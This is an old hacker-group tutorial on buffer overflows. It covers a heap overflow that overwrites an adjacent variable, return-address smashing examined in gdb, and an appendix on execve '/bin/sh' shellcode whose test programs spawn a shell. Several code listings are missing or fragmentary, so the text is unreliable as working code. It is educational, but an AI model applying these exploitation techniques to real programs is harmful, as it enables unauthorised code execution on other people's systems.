BufferOverflow
Intro
Hello, here I am again. This time I'll explain what a buffer overflow actually is and how
you can tell whether a program is vulnerable to buffer overflow exploits. This tutorial
contains C source code, so if you don't know C you may have some trouble following it;
you also need some notions of ASM and of how to use gdb.
I tried to make it as easy as I could, but this still isn't one of those tutorials where you
start out knowing nothing and finish knowing it all. This one takes
some work to understand; hey, it took a huge amount of work to write!
A little inside note: like everyone who is reading these lines, I like to learn. Some weeks
ago I said to myself "Hey, what the heck, why not start reading some texts about buffer
overflows? I know how everything works, but only superficially". So I started learning,
and now I'm trying to pass on the knowledge I gained to everyone who is interested. So
this won't be one of those texts where you'll learn everything; it is more like a
walkthrough, an Introduction like the title says (at the end I'll give you some nice texts).
If you have any questions about this tutorial, post them on our message board; if you find
any "bug" in this tutorial, please email me and I'll correct it. Enjoy.
Exploit?
Well, probably everyone knows what an exploit is. But those
who are entering the security world for the first time probably have no idea what
it is, and that's why I wrote this tiny section.
So, for those who don't know: an exploit is a program, usually written in C, that exploits
some flaw in another program. The exploit lets you run arbitrary
code that does something you shouldn't be able to do with your normal privileges
on the system.
Nowadays, most exploits are what we call Buffer Overflow Exploits. What's that,
you ask? Wait, we'll get there. After all, this is the subject of this tutorial.
Another thing you should know is that everyone knows how to use them (how do you
think most websites get defaced?). The script kiddies just go to sites like
Security Focus, Packetstorm or Fyodor's Exploit World, download one and run it, and then get
busted. But why doesn't everybody write exploits? Well, the problem is that many people
don't know how to spot a vulnerability in source code, or even if they can, they
aren't able to write an exploit. So now that you have an idea of what an exploit is, let's go
ahead to the buffer overflow section.
A buffer overflow problem is rooted in the memory where the program stores its data.
Why's that, you ask? Well, because what a buffer overflow does is write past the end of a
buffer and overwrite specific memory locations with something of your choice, which makes
the program do something that you want.
Well, some of you right now are thinking "WOW, I know how a buffer overflow works",
but you still don't know how to spot one.
Let's follow a program and try to find and fix the buffer overflow.
char *somevar;
char *important;
somevar=(char *)malloc(sizeof(char)*4);
important=(char *)malloc(sizeof(char)*14);
Well, we added 2 lines to the source code and left the rest unchanged. Let's see what those
two lines do.
The printf("%p\n%p", somevar, important); line prints the memory addresses held in the
somevar and important variables. The exit(0); simply stops the program at that point, so the
rest of it never runs; after all, you don't need it for anything right now, your goal was only
to know where the variables are stored.
After running the program you would get output like the following (you will probably not get the
same memory addresses):
0x8049700 <----- This is the address of somevar
0x8049710 <----- This is the address of important
As we can see, the important variable is stored right after somevar, 16 bytes further on. This
lets us use our buffer overflow skills, since somevar is filled from argv[1]. Now we know that
one follows the other, but let's check each memory address so we get a precise picture of how
the data is stored. To do this, let's rewrite the code again.
char *somevar;
char *important;
char *temp; /* we will need another variable */
somevar=(char *)malloc(sizeof(char)*4);
important=(char *)malloc(sizeof(char)*14);
temp = somevar; /* this puts temp at the first memory address we want */
while(temp < important + 14) {
/* this loop ends when we get past the last memory address we want,
the last memory address of the important variable */
printf("%p: %c (0x%x)\n", temp, *temp, *(unsigned int*)temp); /* reconstructed from the output below */
temp++;
}
exit(0);
rest of code here
}
------ End Of partial Code ------
Now let's say that in normal use argv[1] is send. So you just type at your
prompt:
$ program_name send
0x8049700
0x8049710
0x8049700: s (0x646e6573)
0x8049701: e (0x646e65)
0x8049702: n (0x646e) <---- each of these lines represents a memory address
0x8049703: d (0x64)
0x8049704: (0x0)
0x8049705: (0x0)
0x8049706: (0x0)
0x8049707: (0x0)
0x8049708: (0x0)
0x8049709: (0x19000000)
0x804970a: (0x190000)
0x804970b: (0x1900)
0x804970c: (0x19)
0x804970d: (0x63000000)
0x804970e: (0x6f630000)
0x804970f: (0x6d6f6300)
0x8049710: c (0x6d6d6f63)
0x8049711: o (0x616d6d6f)
0x8049712: m (0x6e616d6d)
0x8049713: m (0x646e616d)
0x8049714: a (0x646e61)
0x8049715: n (0x646e)
0x8049716: d (0x64)
0x8049717: (0x0)
0x8049718: (0x0)
0x8049719: (0x0)
0x804971a: (0x0)
0x804971b: (0x0)
0x804971c: (0x0)
0x804971d: (0x0)
$
Nice, isn't it? You can now see that there are 12 memory addresses between the end of
somevar and the start of important. So let's say that you run the program with a command line like:
$ program_name send------------newcommand
0x8049700
0x8049710
Starting To Print memory address:
0x8049700: s (0x646e6573)
0x8049701: e (0x2d646e65)
0x8049702: n (0x2d2d646e)
0x8049703: d (0x2d2d2d64)
0x8049704: - (0x2d2d2d2d)
0x8049705: - (0x2d2d2d2d)
0x8049706: - (0x2d2d2d2d)
0x8049707: - (0x2d2d2d2d)
0x8049708: - (0x2d2d2d2d)
0x8049709: - (0x2d2d2d2d)
0x804970a: - (0x2d2d2d2d)
0x804970b: - (0x2d2d2d2d)
0x804970c: - (0x2d2d2d2d)
0x804970d: - (0x6e2d2d2d)
0x804970e: - (0x656e2d2d)
0x804970f: - (0x77656e2d)
0x8049710: n (0x6377656e) <--- memory address where important variable starts
0x8049711: e (0x6f637765)
0x8049712: w (0x6d6f6377)
0x8049713: c (0x6d6d6f63)
0x8049714: o (0x616d6d6f)
0x8049715: m (0x6e616d6d)
0x8049716: m (0x646e616d)
0x8049717: a (0x646e61)
0x8049718: n (0x646e)
0x8049719: d (0x64)
0x804971a: (0x0)
0x804971b: (0x0)
0x804971c: (0x0)
0x804971d: (0x0)
Hey cool, newcommand overwrote command. Now the program does something you want, instead of
what it was supposed to do.
NOTE: Remember that sometimes the space between somevar and important holds
other variables instead of being empty, so check their values and write the same values back
to the same addresses, or the program can crash before it gets to the variable that you
modified.
Now let's think a little. Why does this happen? As you can see in the source code,
somevar is declared (and allocated) before important, which most of the time means that
somevar comes first in memory. Now let's check how each one gets its value. somevar gets its
value from argv[1], and important gets it from a strcpy() of a fixed string, but the real
problem is that the value of important is assigned first, so when you then assign a value to
somevar, which sits before it, important can be overwritten. This program could be patched
against this buffer overflow by switching those two lines, which become:
strcpy(somevar, argv[1]);
strcpy(important, "command");
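If the program had been written this way, then even if you gave an argument long enough to
reach the memory address of important, it would be overwritten by the true command,
since the value command is assigned to important after somevar is filled. Note that the
copy into somevar still runs past the end of its 4 bytes; the swap only restores important
afterwards.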
This kind of buffer overflow is a heap buffer overflow. As you have probably seen, they
are really easy to do in theory but, in the real world, it's not that easy to pull them off; after
all, the example I gave was a really dumb program, right? It's a real pain in the ass to find
those important variables, and to overflow such a variable you also need to be able to write
to one that sits at a lower memory address. Most of the time these conditions don't all come
together, and that's why we are now going to talk about stack buffer overflows.
Just a little inside note: in the last paragraph I talked about the heap and the stack. You
are probably wondering what each one is. So here's a brief and easy to
understand definition of each:
heap - the space that you reserve for a variable at run time (you use the heap when you call
the malloc() function).
stack - the place where a function's arguments, local variables and return address are kept
while it runs. When you are trying to overflow the stack you'll try to change the return
address, making the code jump to some place in memory where you have put commands that you
want to execute.
So let's get into the stack stuff. Here starts the part that gave me the most problems, and still
does. Here we will need to know ASM and how to handle gdb (believe me, it will
become one of your best friends), but don't give up.
We will talk about Smashing the Stack, a kind of "attack" that changes
the return address (RET). Doing this, you can make the function return to an address where you
have already placed some commands that you want to be executed.
#include <stdio.h>
#include <string.h>

void exploit(char *this) {
char string[20];
strcpy(string,this); /* no length check: this is the bug */
printf("%s\n", string);
}
int main(int argc, char *argv[]) {
exploit(argv[1]);
return 0;
}
Now we will try to call the exploit() function twice. How will we do this? Well, first
we need to find some nice addresses. This time let's use gdb. First we compile.
This is your prompt; now we will disassemble main. To do this we just need to type
disassemble main (you can also type disas main). Hard, isn't it?
Some thinking
As we can see exploit is called at 0x804845c and itself has 0x8048410 as its address.
Back to gdb
-----------
First, you are probably wondering what the x/3bc command is. Well, this is the command
that lets us examine memory.
x/3bc
  ^^^
  |||--- c: display format, characters
  ||---- b: unit size, bytes
  |----- 3: how many units to show
I used it because I was wondering what was being pushed onto the stack at 0x80484cc, and
as you can see it is the string we want to print.
Our Goal
}
Doing this, we overwrite the return address with 0x0804844c, which makes the function return to
the call to exploit again. This puts us in an endless loop. Why could we exploit this
program? Well, because there was no check on the length of the string we were
sending. So here's some advice: if you code something that needs to be secure, always use
functions that do length checking, like fgets() and strncpy(), instead of gets(), strcpy(), and so
on.
gdb tip
Want to see how an exploit affects the vulnerable program? Enter gdb and type.
Then you can see what the exploit does, and correct any problems you are having.
Final Suggestions
Well, we have reached the end. I hope this was of some help to you... I have some
"upgrades" to this tutorial in mind, since it doesn't have everything I wanted to say. But I think it's better
to check everything I want to say first, instead of saying something that I'm not 100% sure of.
If you find something in this tutorial that doesn't add up, please feel free to email me about
it.
Reading Suggestions
These 3 texts will give you a huge amount of info that you may need. They helped me...
They can be found at packetstorm.securify.com
This appendix was written by a friend, Predator, whom I gratefully thank for his efforts.
The original text is below.
Regards
mailto:[email protected]
ICQ#: 46043882
I wrote this as part of Ghost Rider's buffer overflow tutorial, which you can download at
http://blacksun.box.sk
Author: predator
mailto: [email protected]
date : 26/07/2000
Shell code
Now I will talk about shell code. Shell code is a char array consisting of machine
instructions that are used to spawn a shell. Since the program we are trying to exploit doesn't contain
code that executes a shell, we must write it ourselves. For this you must know a little
assembly, C and the x86 architecture; knowing Linux also helps. But only C and assembly are really
needed. Well, let's start.
1. Shell code
Usually shell code is written in a program as ->
1) char c0de[]={0x90,0x90...};
2) char c0de[]="\x90\x90...";
This program is used to run a shell. Why execve, if there are a lot of exec functions? The
answer is simple: execve is the only exec function that is called directly with int $0x80, which is
very important to us.
Well, let's compile this with the -static option and run it in gdb.
Things to do->
Well, we need the exact address in memory of our "/bin/sh" string. We can simply put
"/bin/sh" right after a call, which pushes EIP on the stack, and the pushed EIP will be the address of our
string... Look at pic 0.1
[JJaaaaaaaaaaaaaaaaaaaaaaaaCCssssss]
|^_______________________^|
|________________________|
At the beginning of the code we put a JMP instruction that jumps to the CALL; the CALL
saves EIP and goes to the offset of a. The saved EIP will be the address of our "/bin/sh" string.
int main(){
char buf[5];
long *ret=(long *)(buf+12);
*ret=(long)c0de;
}
--------------- shell2.cpp Code Ends Here ------------------
root@scorpion#cc shell2.cpp -o shell2
root@scorpion#./shell2
sh-2.03
rewrite program:
void main(){
char buf[5];
long *ret=(long *)(buf+12);
*ret=(long)c0de;
}
-------------- shell4.cpp Code Ends Here ----------------
compile shell4.cpp
root@scorpion#cc shell4.cpp -o shell4
root@scorpion#./shell4
sh-2.03#
It works... and it is smaller than our previous c0de, and it contains no 0x00 (\x00, '\0') bytes, so
strcpy() and sprintf() will copy all of it...
void main(){
printf(" Stack pointer is 0x%x\n",get_esp());
}
------- sp.cpp Code Ends Here-----------
root@scorpion#cc sp.cpp -o sp
root@scorpion#./sp
Stack pointer is 0xbffff910 <--- your output may show a different address
root@scorpion#